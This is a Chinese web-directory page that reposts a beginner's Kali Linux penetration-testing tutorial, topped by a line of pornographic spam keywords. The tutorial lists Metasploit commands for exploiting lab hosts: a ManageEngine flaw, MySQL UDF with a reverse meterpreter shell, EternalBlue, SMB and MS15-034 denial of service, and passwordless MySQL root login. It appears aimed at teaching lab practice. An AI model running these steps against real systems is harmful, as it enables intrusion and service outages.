日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

1、攻擊windows服務器漏洞

用nmap對網段進行掃描nmap -sP 192.168. 在進行IP掃描

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

發現Windows服務器漏洞

步驟:

msfconsole---進入滲透模塊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

search manageengine-------搜索滲透模塊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

search reverse_http---------搜索http滲透模塊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

use
exploit/windows/http/manageeine_connectionid_write--------使用該滲透模塊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

set rhosts 192.168.

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

set rport 8022

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

set LpORT 8080

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

run -----------------設置攻擊目標地址,攻擊目標端口,回連的端口號:

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

2、MySQL數據庫漏洞

nmap 192.168.-----掃描端口漏洞

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

步驟:

msfconsole-------進入滲透模式

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

search mysql-------掃描數據庫滲透版本

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

use
exploit/multi/mysql/mysql_udf_payload----------使用該滲透版本進行滲透

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

show options

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

set rhosts 192.168.--------設置攻擊端口號

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

set payload
windows/x64/meterpreter/reverse_tcp--------選擇該滲透方式進行攻擊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

run

3、拒絕服務攻擊漏洞:

使用nmap 192.168. 對端口號進行掃描發現漏洞

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

步驟:

msfconsole-------進入滲透模式

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

search dos/smb/smb-------搜索滲透版本

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

use
auxiliary/dos/smb/smb_loris-------使用該滲透版本進行攻擊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

show options--------

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

set rhosts 192.168.--------設置攻擊端口號

run-----滲透

4.永恒之藍漏洞復現

漏洞描述:

Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。

影響版本:

目前已知受影響的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

復現環境:

攻擊機:Kali2020.3(IP:192.168.88.143)

靶機:Metasploitable3Win2k8 (IP:192.168.88.140)

復現過程:

  1. 用nmap執行C段掃描
Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

2、打開MSF

在終端輸入如下命令打開MSF終端:

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

搜索ms17_010模塊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

這里可以得到幾個工具,其中
auxiliary/scanner/smb/smb_ms17_010是永恒之藍掃描模塊,
exploit/windows/smb/ms17_010_eternalblue是永恒之藍攻擊代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進行攻擊。

執行掃描模塊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

執行ms17_010攻擊模塊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

5.MySQL弱密碼登錄:

1、在kali上執行mysql –h 192.168.26.123 –u root

2、登錄成功,進入MySQL系統

3、測試效果:

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

6.http(ms15_034漏洞)

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

進入msf模塊

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

查看要設置的東西show options

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

設置攻擊ip

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

攻擊前

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

攻擊后,我的是藍屏1秒后,跳轉到立即重啟界面

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

ssh測試

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

開啟端口轉發

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

查看情況

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 

在kali上嘗試連接(rdesktop IP)

Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 


Kali與編程:小白黑客是如何進行Kali Linux滲透測試的?

 



專欄
1個月掌握Kali滲透與黑客編程
作者:Kali與編程
188幣
269人已購
查看

分享到:
標簽:滲透 測試
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定